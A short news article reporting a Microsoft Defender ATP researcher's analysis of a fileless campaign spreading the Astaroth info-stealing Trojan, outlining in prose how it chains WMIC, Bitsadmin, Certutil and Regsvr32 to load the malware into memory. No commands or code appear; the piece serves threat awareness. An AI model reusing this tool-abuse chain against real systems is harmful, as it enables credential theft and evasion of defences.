skip to Main Content

Cybercrime spreads Astaroth Trojan with a fileless malware campaign

Cybercrime Spreads Astaroth Trojan With A Fileless Malware Campaign

Andrea Lelli, Microsoft Defender ATP Research Team cyber security expert: Cybercrime is spreading a fileless malware campaign to infect victims with Astaroth Trojan

Cybercrime is spreading a fileless malware campaign to infect victims with Astaroth Trojan. It has been detected by Andrea Lelli, Microsoft Defender ATP Research Team cyber security expert. It only ran system tools throughout a complex attack chain. The attack involved multiple steps that use various fileless technique. Astaroth is a notorious info-stealing malware known for stealing sensitive information like credentials, keystrokes, and other data, which it exfiltrates and sends to a remote attacker. The attacker can then use stolen data to try moving laterally across networks, carry out financial theft, or sell victim information in the cyber criminal underground. Telemetry showed a sudden increase in the use of WMIC tool to run a script. This made the researchers suspicious of a fileless attack. Upon further investigation, they realized that the campaign was trying to run Astaroth backdoor directly into the memory.

The cyber security experts: The steps of the fileless malware attacks

According to the cyber security experts, the malware attack followed these steps: A malicious link in a spear-phishing email leads to an LNK file. When double-clicked, the LNK file causes the execution of the WMIC tool with the “/Format” parameter, which allows the download and execution of a JavaScript code. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool. All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process. Furthermore, at no point during the attack chain is any file run that’s not a system tool.

Back To Top